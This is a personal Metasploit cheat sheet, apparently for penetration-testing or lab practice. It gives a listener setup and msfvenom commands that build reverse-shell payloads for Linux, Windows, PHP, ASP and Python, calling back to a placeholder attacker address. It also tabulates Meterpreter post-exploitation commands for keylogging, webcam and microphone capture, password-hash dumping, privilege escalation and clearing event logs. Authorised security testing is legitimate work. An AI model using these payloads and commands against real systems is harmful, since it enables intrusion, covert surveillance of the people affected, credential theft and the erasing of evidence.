---
title: Metasploit
date: 2022-09-27T09:00:00Z
draft: false
toc: true
type: note
author: Kaptan
category: Cyber Security
subcategory: Commands
tags:
  - commands
  - tools
---

## MSFconsole

### Basic Commands

```zsh
sessions -i [ID]      # View/connect to open sessions
sessions -u 1         # Upgrade shell to Meterpreter
```

### File Operations

```zsh
download -r [file] [local_dir]      # Download files
upload -r [local_dir] [target_dir]  # Upload files
```

### Quick Listener Setup

```zsh
msfconsole -q -x \
    "use multi/handler; \
    set payload windows/x64/shell_reverse_tcp; \
    set lhost [IP]; \
    set lport [PORT]; \
    exploit"
```

## MSFvenom Payloads

### Linux (ELF)
```zsh
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
```

### Windows (EXE)
```zsh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
```

### Web Payloads
```zsh
# PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

# Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
```

## Meterpreter Commands

### Core Commands
Command | Description
--------|-------------
`background` | Backgrounds the current session
`exit` | Terminate the Meterpreter session
`guid` | Get the session GUID
`help` | Displays the help menu
`info` | Displays information about a Post module
`irb` | Opens an interactive Ruby shell
`load` | Loads Meterpreter extensions
`migrate` | Migrate Meterpreter to another process
`run` | Executes a Meterpreter script or Post module
`sessions` | Switch to another session

### File System Commands
Command | Description
--------|-------------
`cd` | Change directory
`ls` | List files (dir also works)
`pwd` | Print working directory
`edit` | Edit a file
`cat` | Show file contents
`rm` | Delete file
`search` | Search for files
`upload` | Upload file/directory
`download` | Download file/directory

### Networking Commands
Command | Description
--------|-------------
`arp` | Display host ARP cache
`ifconfig` | Display network interfaces
`netstat` | Display network connections
`portfwd` | Forward local port to remote service
`route` | View/modify routing table

### System Commands
Command | Description
--------|-------------
`clearev` | Clear event logs
`execute` | Execute a command
`getpid` | Show current process ID
`getuid` | Show current user
`kill` | Terminate a process
`pkill` | Terminate processes by name
`ps` | List running processes
`reboot` | Reboot remote computer
`shell` | Drop to system shell
`shutdown` | Shutdown remote computer
`sysinfo` | Get system information

### Post-Exploitation Commands
Command | Description
--------|-------------
`idletime` | Show remote user idle time
`keyscan_dump` | Dump keystroke buffer
`keyscan_start` | Start keystroke capture
`keyscan_stop` | Stop keystroke capture
`screenshare` | Watch remote desktop real-time
`screenshot` | Capture desktop screenshot
`record_mic` | Record microphone audio
`webcam_chat` | Start video chat
`webcam_list` | List webcams
`webcam_snap` | Take webcam snapshot
`webcam_stream` | Stream from webcam
`getsystem` | Attempt privilege elevation
`hashdump` | Dump SAM database

**Resources:**
- https://www.hackingarticles.in/metasploit-for-pentester-sessions/ 